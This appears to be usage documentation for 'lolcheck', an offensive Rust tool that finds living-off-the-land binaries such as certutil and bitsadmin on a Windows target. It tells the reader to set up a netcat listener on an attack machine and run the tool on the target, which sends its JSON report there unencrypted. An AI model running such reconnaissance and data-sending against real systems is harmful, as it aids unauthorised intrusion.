Build
cargo build --target x86_64-pc-windows-gnu --release
Set up an example listener on the attack machine. nc accepts a plain TCP connection, so the JSON report arrives unencrypted.
nc -lvnp PORT | jq
On the target machine, run lolcheck with the attack machine's IP:PORT:
lolcheck.exe <IP:PORT>
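Example response from lolcheck on the nc listener (each entry in "found_binaries" is a binary name followed by the path where it was found on the target):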
{
"found_binaries": [
"AddinUtil.exe: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe",
"AddinUtil.exe: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe",
"Aspnet_Compiler.exe: c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe",
"Aspnet_Compiler.exe: c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe",
"At.exe: C:\\WINDOWS\\System32\\At.exe",
"At.exe: C:\\WINDOWS\\SysWOW64\\At.exe",
"Atbroker.exe: C:\\Windows\\System32\\Atbroker.exe",
"Atbroker.exe: C:\\Windows\\SysWOW64\\Atbroker.exe",
"Bitsadmin.exe: C:\\Windows\\System32\\bitsadmin.exe",
"Bitsadmin.exe: C:\\Windows\\SysWOW64\\bitsadmin.exe",
"CertReq.exe: C:\\Windows\\System32\\certreq.exe",
"CertReq.exe: C:\\Windows\\SysWOW64\\certreq.exe",
"Certutil.exe: C:\\Windows\\System32\\certutil.exe",
"Certutil.exe: C:\\Windows\\SysWOW64\\certutil.exe",
"Cmd.exe: C:\\Windows\\System32\\cmd.exe",
"Cmd.exe: C:\\Windows\\SysWOW64\\cmd.exe",
"Cmdkey.exe: C:\\Windows\\System32\\cmdkey.exe",
"Cmdkey.exe: C:\\Windows\\SysWOW64\\cmdkey.exe",
"cmdl32.exe: C:\\Windows\\System32\\cmdl32.exe",
"cmdl32.exe: C:\\Windows\\SysWOW64\\cmdl32.exe",
"Cmstp.exe: C:\\Windows\\System32\\cmstp.exe",
"Cmstp.exe: C:\\Windows\\SysWOW64\\cmstp.exe",
"Colorcpl.exe: C:\\Windows\\System32\\colorcpl.exe",
"Colorcpl.exe: C:\\Windows\\SysWOW64\\colorcpl.exe",
"ComputerDefaults.exe: C:\\Windows\\System32\\ComputerDefaults.exe",
"ComputerDefaults.exe: C:\\Windows\\SysWOW64\\ComputerDefaults.exe",
"ConfigSecurityPolicy.exe: C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe",
...SNIP...
]
}